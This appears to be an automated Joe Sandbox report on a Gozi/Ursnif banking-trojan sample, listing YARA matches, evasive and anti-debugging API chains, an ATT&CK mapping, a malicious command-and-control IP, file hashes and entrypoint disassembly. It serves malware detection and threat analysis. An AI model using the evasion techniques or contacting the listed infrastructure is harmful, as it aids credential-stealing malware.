Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: sadf.exe PID: 4968, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008C82FC	0_2_008C82FC
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008C2792	0_2_008C2792
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008C2DCC	0_2_008C2DCC

Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_00401493
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset,	0_2_00401D95
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_00401F78 NtMapViewOfSection,	0_2_00401F78
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008C737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_008C737C
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008C8521 NtQueryVirtualMemory,	0_2_008C8521

Source: sadf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: sadf.exe

ReversingLabs: Detection: 88%

Source: sadf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\sadf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_008C7256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_008C7256

Source: C:\Users\user\Desktop\sadf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\sadf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\sadf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008C82EB push ecx; ret	0_2_008C82FB
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008CB859 push 0000006Fh; retf	0_2_008CB85C
Source: C:\Users\user\Desktop\sadf.exe	Code function: 0_2_008C7F00 push ecx; ret	0_2_008C7F09

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_0040134F LoadLibraryA,GetProcAddress,

0_2_0040134F

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\sadf.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\sadf.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking system information)

Source: C:\Users\user\Desktop\sadf.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\sadf.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\sadf.exe

API call chain: ExitProcess graph end node

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\sadf.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_0040134F LoadLibraryA,GetProcAddress,

0_2_0040134F

Source: C:\Users\user\Desktop\sadf.exe

Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_00401493

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_008C54EC cpuid

0_2_008C54EC

Source: C:\Users\user\Desktop\sadf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_004012B0

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_00401A49

Source: C:\Users\user\Desktop\sadf.exe

Code function: 0_2_008C54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_008C54EC

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	Path Interception	Path Interception	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Software Packing	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	124 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
sadf.exe	88%	ReversingLabs	Win32.Infostealer.Gozi
sadf.exe	100%	Avira	TR/Crypt.XPACK.Gen7
sadf.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.sadf.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.sadf.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.sadf.exe.8c0000.1.unpack	100%	Avira	HEUR/AGEN.1245293	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://45.8.1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
trackingg-protectioon.cdn1.mozilla.net	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.8.1	sadf.exe, 00000000.00000002.511247920.00000000009FC000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.8.158.104	unknown	Russian Federation		49392	ASBAXETNRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	717378
Start date and time:	2022-10-06 12:27:44 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	sadf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 46% (good quality ratio 44.1%) Quality average: 82.4% Quality standard deviation: 26.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 40 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: sadf.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
45.8.158.104	72.exe	Get hash	malicious	Browse
	c0.exe	Get hash	malicious	Browse
	64.exe	Get hash	malicious	Browse
	gozi.exe	Get hash	malicious	Browse
	b6.exe	Get hash	malicious	Browse
	9a.exe	Get hash	malicious	Browse
	336.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASBAXETNRU	4_202210250456866742.xls	Get hash	malicious	Browse	91.213.50.43
	4_202210250456866742.xls	Get hash	malicious	Browse	91.213.50.43
	DB348DC69788F96C6CCDAEDB34B150FA21AC9D275A523.exe	Get hash	malicious	Browse	91.229.90.152
	file.exe	Get hash	malicious	Browse	194.87.31.137
	RLOI JS01-2.exe	Get hash	malicious	Browse	194.50.171.236
	file.exe	Get hash	malicious	Browse	194.87.31.137
	c4FhIbqPB5.exe	Get hash	malicious	Browse	212.192.14.28
	72.exe	Get hash	malicious	Browse	45.8.158.104
	c0.exe	Get hash	malicious	Browse	45.8.158.104
	indicative_exchange_rates_dtd_26_09_2022_pdf.exe	Get hash	malicious	Browse	91.213.50.40
	arm-20220923-2008.elf	Get hash	malicious	Browse	212.196.133.217
	64.exe	Get hash	malicious	Browse	45.8.158.104
	7_202209759445200205.xls	Get hash	malicious	Browse	91.213.50.18
	7_202209759445200205.xls	Get hash	malicious	Browse	91.213.50.18
	gozi.exe	Get hash	malicious	Browse	45.8.158.104
	b6.exe	Get hash	malicious	Browse	45.8.158.104
	9a.exe	Get hash	malicious	Browse	45.8.158.104
	336.exe	Get hash	malicious	Browse	45.8.158.104
	2_202209828312395764.xls	Get hash	malicious	Browse	91.213.50.18
	2_202209828312395764.xls	Get hash	malicious	Browse	91.213.50.18

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.519548477170318
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sadf.exe
File size:	37888
MD5:	76ebba129360ad5093f0fe66910eb06d
SHA1:	a0297ed108f534539bda64c7c0df0caefc18ec09
SHA256:	f8388847ebddbc0c6db43ede0ee839fa304fc4786d4a7c8285eb746a5a2ee711
SHA512:	b752d9d3e9fab50b1f1a4b3cfe565dc5c0bd1a909abe0b88ae5ee99c241280dace99ee33a6cc5bf2447bbb11975fb6e45b835c380555fb31fa5b15f7d4948bdc
SSDEEP:	768:LQLm41fM01vA4yRzFiCRn7IYbo7gMaBMOF6c629ptoj:LL41fMSv1AnRnFLMaMOF6c6YK
TLSH:	C203E0137B642D3EF6C305393E12E20147990175873FE1EA07B3642D9922EDB55AF786
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x40182f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	1640d668d1471f340cbe565fe63522f6

Entrypoint Preview

Instruction
push esi
xor esi, esi
push esi
push 00400000h
push esi
call dword ptr [0040203Ch]
mov dword ptr [00403160h], eax
cmp eax, esi
je 00007FBD28CB62A7h
push esi
call dword ptr [00402008h]
mov dword ptr [00403170h], eax
call dword ptr [00402044h]
call 00007FBD28CB5EB9h
push dword ptr [00403160h]
mov esi, eax
call dword ptr [00402040h]
push esi
call dword ptr [00402048h]
pop esi
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, eax
mov eax, dword ptr [00403180h]
mov ecx, dword ptr [esi+3Ch]
mov ecx, dword ptr [ecx+esi+50h]
lea edx, dword ptr [eax-69B24F45h]
not edx
lea ecx, dword ptr [ecx+eax-69B24F45h]
push edi
and ecx, edx
lea edx, dword ptr [ebp-08h]
push edx
lea edx, dword ptr [ebp-04h]
push edx
add eax, 964DA0FCh
push eax
push ecx
call 00007FBD28CB650Dh
test eax, eax
jne 00007FBD28CB62DCh
mov edi, dword ptr [ebp-04h]
push esi
push edi
call 00007FBD28CB65E3h
mov ebx, eax
test ebx, ebx
jne 00007FBD28CB62B8h
mov esi, dword ptr [edi+3Ch]
add esi, edi
push esi
call 00007FBD28CB5D04h
mov ebx, eax
test ebx, ebx
jne 00007FBD28CB62A7h
push edi
mov eax, esi
call 00007FBD28CB67E4h
mov ebx, eax
test ebx, ebx
jne 00007FBD28CB6299h
mov esi, dword ptr [esi+28h]
push eax
push 00000001h
add esi, edi
push edi
call esi
test eax, eax
jne 00007FBD28CB628Ah
call dword ptr [0000202Ch]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20e8	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5000	0x10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xd8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0xa8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
